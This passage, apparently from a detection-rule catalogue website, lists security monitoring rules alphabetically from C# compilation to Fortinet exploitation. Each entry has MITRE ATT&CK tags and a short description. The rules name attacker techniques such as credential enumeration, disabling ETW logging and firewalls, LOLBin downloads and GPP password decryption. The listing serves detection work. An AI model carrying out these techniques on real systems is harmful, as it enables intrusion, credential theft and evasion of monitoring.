    Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.


    Read More
  • Dynamic CSharp Compile Artefact

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027.004  ·
    Share on: twitter facebook linkedin copy

    When C# is compiled dynamically, a .cmdline file will be created as a part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution


    Read More
  • Elise Backdoor Activity

    calendar Aug 12, 2024 · attack.g0030 attack.g0050 attack.s0081 attack.execution attack.t1059.003 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects Elise backdoor activity used by APT32


    Read More
  • Email Exifiltration Via Powershell

    calendar Aug 12, 2024 · attack.exfiltration  ·
    Share on: twitter facebook linkedin copy

    Detects email exfiltration via powershell cmdlets


    Read More
  • Enable BPF Kprobes Tracing

    calendar Aug 12, 2024 · attack.execution attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects common command used to enable bpf kprobes tracing


    Read More
  • Enable LM Hash Storage - ProcCreation

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1112  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.


    Read More
  • Enable Local Manifest Installation With Winget

    calendar Aug 12, 2024 · attack.defense-evasion attack.persistence  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.


    Read More
  • Enable Microsoft Dynamic Data Exchange

    calendar Aug 12, 2024 · attack.execution attack.t1559.002  ·
    Share on: twitter facebook linkedin copy

    Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.


    Read More
  • Enable Windows Remote Management

    calendar Aug 12, 2024 · attack.lateral-movement attack.t1021.006  ·
    Share on: twitter facebook linkedin copy

    Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.


    Read More
  • Enabled User Right in AD to Control User Objects

    calendar Aug 12, 2024 · attack.persistence attack.t1098  ·
    Share on: twitter facebook linkedin copy

    Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.


    Read More
  • Enabling COR Profiler Environment Variables

    calendar Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.defense-evasion attack.t1574.012  ·
    Share on: twitter facebook linkedin copy

    Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.


    Read More
  • End User Consent

    calendar Aug 12, 2024 · attack.credential-access attack.t1528  ·
    Share on: twitter facebook linkedin copy

    Detects when an end user consents to an application


    Read More
  • End User Consent Blocked

    calendar Aug 12, 2024 · attack.credential-access attack.t1528  ·
    Share on: twitter facebook linkedin copy

    Detects when end user consent is blocked due to risk-based consent.


    Read More
  • Enumerate Credentials from Windows Credential Manager With PowerShell

    calendar Aug 12, 2024 · attack.credential-access attack.t1555  ·
    Share on: twitter facebook linkedin copy

    Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.


    Read More
  • Enumeration for 3rd Party Creds From CLI

    calendar Aug 12, 2024 · attack.credential-access attack.t1552.002  ·
    Share on: twitter facebook linkedin copy

    Detects processes that query known 3rd party registry keys that holds credentials via commandline


    Read More
  • Enumeration for Credentials in Registry

    calendar Aug 12, 2024 · attack.credential-access attack.t1552.002  ·
    Share on: twitter facebook linkedin copy

    Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services


    Read More
  • Equation Group C2 Communication

    calendar Aug 12, 2024 · attack.command-and-control attack.g0020 attack.t1041 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects communication to C2 servers mentioned in the operational notes of the ShadowBroker leak of EquationGroup C2 tools


    Read More
  • Equation Group DLL_U Export Function Load

    calendar Aug 12, 2024 · attack.g0020 attack.defense-evasion attack.t1218.011 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects a specific export function name used by one of EquationGroup tools


    Read More
  • Equation Group Indicators

    calendar Aug 12, 2024 · attack.execution attack.g0020 attack.t1059.004  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious shell commands used in various Equation Group scripts and tools


    Read More
  • Esentutl Gather Credentials

    calendar Aug 12, 2024 · attack.credential-access attack.t1003 attack.t1003.003  ·
    Share on: twitter facebook linkedin copy

    Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.


    Read More
  • Esentutl Steals Browser Information

    calendar Aug 12, 2024 · attack.collection attack.t1005  ·
    Share on: twitter facebook linkedin copy

    One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe


    Read More
  • Esentutl Volume Shadow Copy Service Keys

    calendar Aug 12, 2024 · attack.credential-access attack.t1003.002  ·
    Share on: twitter facebook linkedin copy

    Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\System\CurrentControlSet\Services\VSS\Diag\VolSnap\Volume are captured.


    Read More
  • ETW Logging Disabled For rpcrt4.dll

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1112 attack.t1562  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll


    Read More
  • ETW Logging Disabled For SCM

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1112 attack.t1562  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM)


    Read More
  • ETW Logging Disabled In .NET Processes - Registry

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1112 attack.t1562  ·
    Share on: twitter facebook linkedin copy

    Potential adversaries stopping ETW providers recording loaded .NET assemblies.


    Read More
  • ETW Logging Disabled In .NET Processes - Sysmon Registry

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1112 attack.t1562  ·
    Share on: twitter facebook linkedin copy

    Potential adversaries stopping ETW providers recording loaded .NET assemblies.


    Read More
  • ETW Logging Tamper In .NET Processes Via CommandLine

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562  ·
    Share on: twitter facebook linkedin copy

    Detects changes to environment variables related to ETW logging via the CommandLine. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.


    Read More
  • ETW Trace Evasion Activity

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1070 attack.t1562.006 car.2016-04-002  ·
    Share on: twitter facebook linkedin copy

    Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion.


    Read More
  • EventLog EVTX File Deleted

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1070  ·
    Share on: twitter facebook linkedin copy

    Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence


    Read More
  • EvilNum APT Golden Chickens Deployment Via OCX Files

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218.011 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report


    Read More
  • Exchange Exploitation CVE-2021-28480

    calendar Aug 12, 2024 · attack.initial-access attack.t1190 cve.2021-28480 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480


    Read More
  • Exchange Exploitation Used by HAFNIUM

    calendar Aug 12, 2024 · attack.initial-access attack.t1190 attack.g0125 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects exploitation attempts in Exchange server logs as described in blog posts reporting on HAFNIUM group activity


    Read More
  • Exchange PowerShell Cmdlet History Deleted

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1070  ·
    Share on: twitter facebook linkedin copy

    Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence


    Read More
  • Exchange PowerShell Snap-Ins Usage

    calendar Aug 12, 2024 · attack.execution attack.t1059.001 attack.collection attack.t1114  ·
    Share on: twitter facebook linkedin copy

    Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27


    Read More
  • Exchange Set OabVirtualDirectory ExternalUrl Property

    calendar Aug 12, 2024 · attack.persistence attack.t1505.003  ·
    Share on: twitter facebook linkedin copy

    Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log


    Read More
  • Executable from Webdav

    calendar Aug 12, 2024 · attack.command-and-control attack.t1105  ·
    Share on: twitter facebook linkedin copy

    Detects executable access via webdav6. Can be seen in APT 29 such as from the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/


    Read More
  • Execute Code with Pester.bat

    calendar Aug 12, 2024 · attack.execution attack.t1059.001 attack.defense-evasion attack.t1216  ·
    Share on: twitter facebook linkedin copy

    Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)


    Read More
  • Execute Code with Pester.bat as Parent

    calendar Aug 12, 2024 · attack.execution attack.t1059.001 attack.defense-evasion attack.t1216  ·
    Share on: twitter facebook linkedin copy

    Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)


    Read More
  • Execute Files with Msdeploy.exe

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects file execution using the msdeploy.exe lolbin


    Read More
  • Execute From Alternate Data Streams

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1564.004  ·
    Share on: twitter facebook linkedin copy

    Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection


    Read More
  • Execute Invoke-command on Remote Host

    calendar Aug 12, 2024 · attack.lateral-movement attack.t1021.006  ·
    Share on: twitter facebook linkedin copy

    Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.


    Read More
  • Execute MSDT Via Answer File

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218 attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab)


    Read More
  • Execute Pcwrun.EXE To Leverage Follina

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218 attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability


    Read More
  • Execution DLL of Choice Using WAB.EXE

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.


    Read More
  • Execution Of Non-Existing File

    calendar Aug 12, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)


    Read More
  • Execution of Powershell Script in Public Folder

    calendar Aug 12, 2024 · attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder


    Read More
  • Execution Of Script Located In Potentially Suspicious Directory

    calendar Aug 12, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects executions of scripts located in potentially suspicious locations such as "/tmp" via a shell such as "bash", "sh", etc.


    Read More
  • Execution via stordiag.exe

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe


    Read More
  • Execution via WorkFolders.exe

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects using WorkFolders.exe to execute an arbitrary control.exe


    Read More
  • Exploit for CVE-2015-1641

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1036.005 cve.2015-1641 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641


    Read More
  • Exploit for CVE-2017-0261

    calendar Aug 12, 2024 · attack.execution attack.t1203 attack.t1204.002 attack.initial-access attack.t1566.001 cve.2017-0261 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262


    Read More
  • Exploit for CVE-2017-8759

    calendar Aug 12, 2024 · attack.execution attack.t1203 attack.t1204.002 attack.initial-access attack.t1566.001 cve.2017-8759 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759


    Read More
  • Exploitation of CVE-2021-26814 in Wazuh

    calendar Aug 12, 2024 · attack.initial-access attack.t1190 cve.2021-21978 cve.2021-26814 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814


    Read More
  • Exploited CVE-2020-10189 Zoho ManageEngine

    calendar Aug 12, 2024 · attack.initial-access attack.t1190 attack.execution attack.t1059.001 attack.t1059.003 attack.s0190 cve.2020-10189 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189


    Read More
  • Exploiting SetupComplete.cmd CVE-2019-1378

    calendar Aug 12, 2024 · attack.privilege-escalation attack.t1068 attack.execution attack.t1059.003 attack.t1574 cve.2019-1378 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378


    Read More
  • Explorer NOUACCHECK Flag

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1548.002  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks


    Read More
  • Explorer Process Tree Break

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1036  ·
    Share on: twitter facebook linkedin copy

    Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries, which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost"


    Read More
  • Exports Registry Key To an Alternate Data Stream

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1564.004  ·
    Share on: twitter facebook linkedin copy

    Exports the target Registry key and hides it in the specified alternate data stream.


    Read More
  • External Disk Drive Or USB Storage Device Was Recognized By The System

    calendar Aug 12, 2024 · attack.t1091 attack.t1200 attack.lateral-movement attack.initial-access  ·
    Share on: twitter facebook linkedin copy

    Detects external disk drives or plugged-in USB devices.


    Read More
  • External Remote RDP Logon from Public IP

    calendar Aug 12, 2024 · attack.initial-access attack.credential-access attack.t1133 attack.t1078 attack.t1110  ·
    Share on: twitter facebook linkedin copy

    Detects successful logon from public IP address via RDP. This can indicate a publicly-exposed RDP port.


    Read More
  • External Remote SMB Logon from Public IP

    calendar Aug 12, 2024 · attack.initial-access attack.credential-access attack.t1133 attack.t1078 attack.t1110  ·
    Share on: twitter facebook linkedin copy

    Detects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port.


    Read More
  • Extracting Information with PowerShell

    calendar Aug 12, 2024 · attack.credential-access attack.t1552.001  ·
    Share on: twitter facebook linkedin copy

    Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.


    Read More
  • Failed Authentications From Countries You Do Not Operate Out Of

    calendar Aug 12, 2024 · attack.initial-access attack.credential-access attack.t1078.004 attack.t1110  ·
    Share on: twitter facebook linkedin copy

    Detect failed authentications from countries you do not operate out of.


    Read More
  • Failed DNS Zone Transfer

    calendar Aug 12, 2024 · attack.reconnaissance attack.t1590.002  ·
    Share on: twitter facebook linkedin copy

    Detects when a DNS zone transfer failed.


    Read More
  • Failed Logon From Public IP

    calendar Aug 12, 2024 · attack.initial-access attack.persistence attack.t1078 attack.t1190 attack.t1133  ·
    Share on: twitter facebook linkedin copy

    Detects a failed logon attempt from a public IP. A login from a public IP can indicate a misconfigured firewall or network boundary.


    Read More
  • Failed MSExchange Transport Agent Installation

    calendar Aug 12, 2024 · attack.persistence attack.t1505.002  ·
    Share on: twitter facebook linkedin copy

    Detects a failed installation of a Exchange Transport Agent


    Read More
  • File and Directory Discovery - MacOS

    calendar Aug 12, 2024 · attack.discovery attack.t1083  ·
    Share on: twitter facebook linkedin copy

    Detects usage of system utilities to discover files and directories


    Read More
  • File And SubFolder Enumeration Via Dir Command

    calendar Aug 12, 2024 · attack.discovery attack.t1217  ·
    Share on: twitter facebook linkedin copy

    Detects usage of the "dir" command part of Widows CMD with the "/S" command line flag in order to enumerate files in a specified directory and all subdirectories.


    Read More
  • File Creation Date Changed to Another Year

    calendar Aug 12, 2024 · attack.t1070.006 attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system. Note that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.


    Read More
  • File Creation In Suspicious Directory By Msdt.EXE

    calendar Aug 12, 2024 · attack.persistence attack.t1547.001 cve.2022-30190  ·
    Share on: twitter facebook linkedin copy

    Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities


    Read More
  • File Decoded From Base64/Hex Via Certutil.EXE

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of certutil with either the "decode" or "decodehex" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution


    Read More
  • File Decryption Using Gpg4win

    calendar Aug 12, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects usage of Gpg4win to decrypt files


    Read More
  • File Deletion

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1070.004  ·
    Share on: twitter facebook linkedin copy

    Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity


    Read More
  • File Deletion Via Del

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1070.004  ·
    Share on: twitter facebook linkedin copy

    Detects execution of the builtin "del"/"erase" commands in order to delete files. Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.


    Read More
  • File Download And Execution Via IEExec.EXE

    calendar Aug 12, 2024 · attack.command-and-control attack.t1105  ·
    Share on: twitter facebook linkedin copy

    Detects execution of the IEExec utility to download and execute files


    Read More
  • File Download From Browser Process Via Inline URL

    calendar Aug 12, 2024 · attack.command-and-control attack.t1105  ·
    Share on: twitter facebook linkedin copy

    Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state.


    Read More
  • File Download Using Notepad++ GUP Utility

    calendar Aug 12, 2024 · attack.command-and-control attack.t1105  ·
    Share on: twitter facebook linkedin copy

    Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.


    Read More
  • File Download Using ProtocolHandler.exe

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects usage of "ProtocolHandler" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)


    Read More
  • File Download Via Bitsadmin

    calendar Aug 12, 2024 · attack.defense-evasion attack.persistence attack.t1197 attack.s0190 attack.t1036.003  ·
    Share on: twitter facebook linkedin copy

    Detects usage of bitsadmin downloading a file


    Read More
  • File Download Via Bitsadmin To A Suspicious Target Folder

    calendar Aug 12, 2024 · attack.defense-evasion attack.persistence attack.t1197 attack.s0190 attack.t1036.003  ·
    Share on: twitter facebook linkedin copy

    Detects usage of bitsadmin downloading a file to a suspicious target folder


    Read More
  • File Download Via Bitsadmin To An Uncommon Target Folder

    calendar Aug 12, 2024 · attack.defense-evasion attack.persistence attack.t1197 attack.s0190 attack.t1036.003  ·
    Share on: twitter facebook linkedin copy

    Detects usage of bitsadmin downloading a file to uncommon target folder


    Read More
  • File Download via CertOC.EXE

    calendar Aug 12, 2024 · attack.command-and-control attack.t1105  ·
    Share on: twitter facebook linkedin copy

    Detects when a user downloads a file by using CertOC.exe


    Read More
  • File Download Via InstallUtil.EXE

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE"


    Read More
  • File Download Via Windows Defender MpCmpRun.EXE

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218 attack.command-and-control attack.t1105  ·
    Share on: twitter facebook linkedin copy

    Detects the use of Windows Defender MpCmdRun.EXE to download files


    Read More
  • File Download with Headless Browser

    calendar Aug 12, 2024 · attack.command-and-control attack.t1105  ·
    Share on: twitter facebook linkedin copy

    Detects execution of chromium based browser in headless mode using the "dump-dom" command line to download files


    Read More
  • File Encoded To Base64 Via Certutil.EXE

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of certutil with the "encode" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration


    Read More
  • File Encryption Using Gpg4win

    calendar Aug 12, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects usage of Gpg4win to encrypt files


    Read More
  • File Encryption/Decryption Via Gpg4win From Suspicious Locations

    calendar Aug 12, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects usage of Gpg4win to encrypt/decrypt files located in potentially suspicious locations.


    Read More
  • File or Folder Permissions Change

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1222.002  ·
    Share on: twitter facebook linkedin copy

    Detects file and folder permission changes.


    Read More
  • File Time Attribute Change

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1070.006  ·
    Share on: twitter facebook linkedin copy

    Detect file time attribute change to hide new or changes to existing files


    Read More
  • File Time Attribute Change - Linux

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1070.006  ·
    Share on: twitter facebook linkedin copy

    Detect file time attribute change to hide new or changes to existing files.


    Read More
  • File Was Not Allowed To Run

    calendar Aug 12, 2024 · attack.execution attack.t1204.002 attack.t1059.001 attack.t1059.003 attack.t1059.005 attack.t1059.006 attack.t1059.007  ·
    Share on: twitter facebook linkedin copy

    Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.


    Read More
  • File With Suspicious Extension Downloaded Via Bitsadmin

    calendar Aug 12, 2024 · attack.defense-evasion attack.persistence attack.t1197 attack.s0190 attack.t1036.003  ·
    Share on: twitter facebook linkedin copy

    Detects usage of bitsadmin downloading a file with a suspicious extension


    Read More
  • File With Uncommon Extension Created By An Office Application

    calendar Aug 12, 2024 · attack.t1204.002 attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of files with an executable or script extension by an Office application.


    Read More
  • Files Added To An Archive Using Rar.EXE

    calendar Aug 12, 2024 · attack.collection attack.t1560.001  ·
    Share on: twitter facebook linkedin copy

    Detects usage of "rar" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.


    Read More
  • Files With System DLL Name In Unsuspected Locations

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1036.005  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of a file with the ".dll" extension that has the name of a System DLL in uncommon or unsuspected locations. (Outisde of "System32", "SysWOW64", etc.). It is highly recommended to perform an initial baseline before using this rule in production.


    Read More
  • Files With System Process Name In Unsuspected Locations

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1036.005  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.). It is highly recommended to perform an initial baseline before using this rule in production.


    Read More
  • Filter Driver Unloaded Via Fltmc.EXE

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1070 attack.t1562 attack.t1562.002  ·
    Share on: twitter facebook linkedin copy

    Detect filter driver unloading activity via fltmc.exe


    Read More
  • Findstr GPP Passwords

    calendar Aug 12, 2024 · attack.credential-access attack.t1552.006  ·
    Share on: twitter facebook linkedin copy

    Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.


    Read More
  • Findstr Launching .lnk File

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1036 attack.t1202 attack.t1027.003  ·
    Share on: twitter facebook linkedin copy

    Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack


    Read More
  • Finger.EXE Execution

    calendar Aug 12, 2024 · attack.command-and-control attack.t1105  ·
    Share on: twitter facebook linkedin copy

    Detects execution of the "finger.exe" utility. Finger.EXE or "TCPIP Finger Command" is an old utility that is still present on modern Windows installation. It Displays information about users on a specified remote computer (typically a UNIX computer) that is running the finger service or daemon. Due to the old nature of this utility and the rareness of machines having the finger service. Any execution of "finger.exe" can be considered "suspicious" and worth investigating.


    Read More
  • Fireball Archer Install

    calendar Aug 12, 2024 · attack.execution attack.defense-evasion attack.t1218.011 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects Archer malware invocation via rundll32


    Read More
  • Firewall Disabled via Netsh.EXE

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.004 attack.s0108  ·
    Share on: twitter facebook linkedin copy

    Detects netsh commands that turns off the Windows firewall


    Read More
  • Firewall Rule Deleted Via Netsh.EXE

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.004  ·
    Share on: twitter facebook linkedin copy

    Detects the removal of a port or application rule in the Windows Firewall configuration using netsh


    Read More
  • Firewall Rule Update Via Netsh.EXE

    calendar Aug 12, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects execution of netsh with the "advfirewall" and the "set" option in order to set new values for properties of a existing rule


    Read More
  • First Time Seen Remote Named Pipe

    calendar Aug 12, 2024 · attack.lateral-movement attack.t1021.002  ·
    Share on: twitter facebook linkedin copy

    This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes


    Read More
  • First Time Seen Remote Named Pipe - Zeek

    calendar Aug 12, 2024 · attack.lateral-movement attack.t1021.002  ·
    Share on: twitter facebook linkedin copy

    This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes


    Read More
  • Flash Player Update from Suspicious Location

    calendar Aug 12, 2024 · attack.initial-access attack.t1189 attack.execution attack.t1204.002 attack.defense-evasion attack.t1036.005  ·
    Share on: twitter facebook linkedin copy

    Detects a flashplayer update from an unofficial location


    Read More
  • FlowCloud Registry Markers

    calendar Aug 12, 2024 · attack.persistence attack.t1112  ·
    Share on: twitter facebook linkedin copy

    Detects FlowCloud malware registry markers from threat group TA410. The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components.


    Read More
  • Flush Iptables Ufw Chain

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.004  ·
    Share on: twitter facebook linkedin copy

    Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic


    Read More
  • FoggyWeb Backdoor DLL Loading

    calendar Aug 12, 2024 · attack.resource-development attack.t1587 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected "version.dll" dll


    Read More
  • Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet

    calendar Aug 12, 2024 · attack.collection attack.t1074.001  ·
    Share on: twitter facebook linkedin copy

    Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.


    Read More
  • Folder Removed From Exploit Guard ProtectedFolders List - Registry

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects the removal of folders from the "ProtectedFolders" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder


    Read More
  • Forfiles Command Execution

    calendar Aug 12, 2024 · attack.execution attack.t1059  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of "forfiles" with the "/c" flag. While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary. Can be used to bypass application whitelisting.


    Read More
  • Formbook Process Creation

    calendar Aug 12, 2024 · attack.resource-development attack.t1587.001 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.


    Read More
  • Fortinet CVE-2018-13379 Exploitation

    calendar Aug 12, 2024 · attack.initial-access attack.t1190 cve.2018-13379 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs


    Read More
  • Fortinet CVE-2021-22123 Exploitation

    calendar Aug 12, 2024 · attack.initial-access attack.t1190 cve.2021-22123 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs


    Read More
